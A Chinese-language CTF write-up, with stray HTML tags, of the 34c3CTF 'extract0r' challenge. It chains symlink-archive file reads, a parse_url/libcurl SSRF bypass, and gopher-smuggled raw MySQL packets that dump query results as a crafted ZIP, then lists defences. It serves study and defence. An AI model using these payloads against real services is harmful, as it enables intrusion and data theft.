Gopher协议攻击MySQL技术分析与实践<\/h1>

1. 背景与题目概述<\/h2>

这道CTF题目来自34c3CTF的web题目"extract0r"，涉及一个安全解压服务。用户提供zip文件的URL，服务端会下载并解压该文件。题目通过多个安全限制来防止攻击，但存在可利用的漏洞链：<\/p>

任意文件读取漏洞<\/li>
SSRF漏洞<\/li>

MySQL协议攻击<\/li> <\/ol>

2. 初始漏洞：任意文件读取<\/h2>

2.1 限制条件分析<\/h3>

题目设置了多重限制：<\/p>

输入域名中不能含有数字<\/li>
压缩文件中不能含有目录<\/li>

解压后的目录不解析PHP<\/li> <\/ul>

2.2 符号链接绕过<\/h3>

通过创建包含符号链接的压缩包实现任意文件读取：<\/p>

ln -s ..\/index.php test_link
<\/span><\/span>7za a -t7z -r test.7z test
<\/span><\/span><\/code><\/pre>上传后访问test_link<\/code>可读取index.php<\/code>源代码。<\/p>
2.3 隐藏文件绕过<\/h3>
verify_extracted()<\/code>函数使用glob($directory."\/*")<\/code>遍历文件，无法检测以.<\/code>开头的文件：<\/p>
ln -s \/ .a
<\/span><\/span>7za a -t7z -r test.7z .a
<\/span><\/span><\/code><\/pre>上传后访问.a<\/code>可遍历根目录，发现关键文件：

\/home\/extract0r\/create_a_backup_of_my_supersecret_flag.sh<\/code><\/p>
3. SSRF漏洞利用<\/h2>
3.1 URL解析差异<\/h3>
利用parse_url<\/code>和libcurl<\/code>解析差异绕过IP检查：<\/p>

PHP parse_url<\/strong>：host匹配最后一个@<\/code>后的内容<\/li>
libcurl<\/strong>：host匹配第一个@<\/code>后的内容<\/li>
<\/ul>
示例：<\/p>
http:\/\/u:p@a.com:3306@b.com\/
<\/code><\/pre>
PHP解析为访问b.com，而libcurl实际请求a.com:3306<\/p>
3.2 题目限制与绕过<\/h3>
题目clean_parts()<\/code>过滤了空白字符和数字，可使用以下形式：<\/p>
gopher:\/\/foo@[cafebabe.cf]@yolo.com:3306
<\/code><\/pre>
或<\/p>
gopher:\/\/foo@localhost:f@ricterz.me:3306\/
<\/code><\/pre>
4. MySQL协议分析<\/h2>
4.1 认证流程<\/h3>
MySQL 4.0+协议采用挑战\/应答认证：<\/p>

服务器发送挑战数(scramble)<\/li>
客户端用挑战数加密密码后返回<\/li>
服务器验证结果<\/li>
<\/ol>
当密码为空时，加密后的密文也为空，认证包固定。<\/p>
4.2 数据包结构<\/h3>
MySQL数据包前有4字节包头：<\/p>

前3字节：包长度(小端序)<\/li>
第4字节：包序号(从0开始)<\/li>
<\/ul>
4.2.1 握手初始化报文(服务器→客户端)<\/h4>
示例：<\/p>
4C0000000A352E372E31382D31000000006B69457B3C342E4300FFF7080200FF81150000000000000000003A6A02314D2661447951577F006D7973716C5F6E61746976655F70617373776F726400
<\/code><\/pre>
4.2.2 认证报文(客户端→服务器)<\/h4>
密码为空时的固定认证包：<\/p>
85000001085F000000010000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
<\/code><\/pre>
4.2.3 命令报文<\/h4>
结构简单：<\/p>

第1字节：命令类型(0x02切换数据库，0x03SQL查询)<\/li>
后面：SQL语句<\/li>
<\/ul>
4.3 完整攻击流程<\/h3>

发送认证包<\/li>
发送SQL命令包<\/li>
添加4个空字节强制断开连接<\/li>
<\/ol>
5. ZIP文件构造<\/h2>
5.1 ZIP文件结构<\/h3>
合法ZIP文件包含四部分：<\/p>

Local file header<\/li>
压缩后的Deflate数据<\/li>
Central directory file header<\/li>
End of central directory record<\/li>
<\/ol>
5.2 构造技巧<\/h3>
使用SQL的concat<\/code>函数构造ZIP文件：<\/p>
select<\/span> concat(zip_header, (查询结果<\/span>), zip_eof) into<\/span> dumpfile '\/tmp\/test.zip'<\/span>
<\/span><\/span><\/code><\/pre>示例：<\/p>
select<\/span> concat(
<\/span><\/span>  cast<\/span>(0<\/span>x504b03040a00000000000000000000000000e8030000e803000010000000746869735f69735f7468655f666c6167 as<\/span> binary),
<\/span><\/span>  rpad((select<\/span> now()), 1000<\/span>, '-'<\/span>),
<\/span><\/span>  cast<\/span>(0<\/span>x504b01021e030a00000000000000000000000000100000000000000000000000000000000000746869735f69735f7468655f666c6167504b0506000000000100010036000000640000000000 as<\/span> binary)
<\/span><\/span>) into<\/span> dumpfile '\/tmp\/test.zip'<\/span>;
<\/span><\/span><\/code><\/pre>6. 完整攻击链<\/h2>

通过符号链接发现无密码MySQL用户<\/li>
利用URL解析差异绕过IP检查<\/li>
构造MySQL协议payload执行SQL<\/li>
将查询结果构造为ZIP文件格式<\/li>
通过解压服务获取查询结果<\/li>
<\/ol>
最终攻击URL格式：<\/p>
gopher:\/\/foo@[cafebabe.cf]@yolo.com:3306\/_+(MySQL packet)+(四个空字节)
<\/code><\/pre>
7. 防御措施<\/h2>


符号链接防御<\/strong>：<\/p>

解压前检查文件类型<\/li>
禁止解压符号链接文件<\/li>
<\/ul>
<\/li>

SSRF防御<\/strong>：<\/p>

统一URL解析逻辑<\/li>
严格限制访问的IP范围<\/li>
禁用危险协议(gopher等)<\/li>
<\/ul>
<\/li>

MySQL安全<\/strong>：<\/p>

禁止空密码账户<\/li>
限制远程访问<\/li>
使用防火墙规则<\/li>
<\/ul>
<\/li>

文件处理<\/strong>：<\/p>

解压前验证文件完整性<\/li>
限制解压文件大小和数量<\/li>
使用安全解压库<\/li>
<\/ul>
<\/li>
<\/ol>
8. 总结<\/h2>
这道题目展示了从任意文件读取到SSRF再到MySQL协议攻击的完整漏洞链，涉及：<\/p>

文件系统符号链接利用<\/li>
URL解析差异导致的SSRF<\/li>
MySQL协议分析与构造<\/li>
ZIP文件格式构造<\/li>
<\/ul>
关键点在于理解各组件的工作原理和它们之间的交互方式，通过精心构造的输入实现攻击目标。<\/p>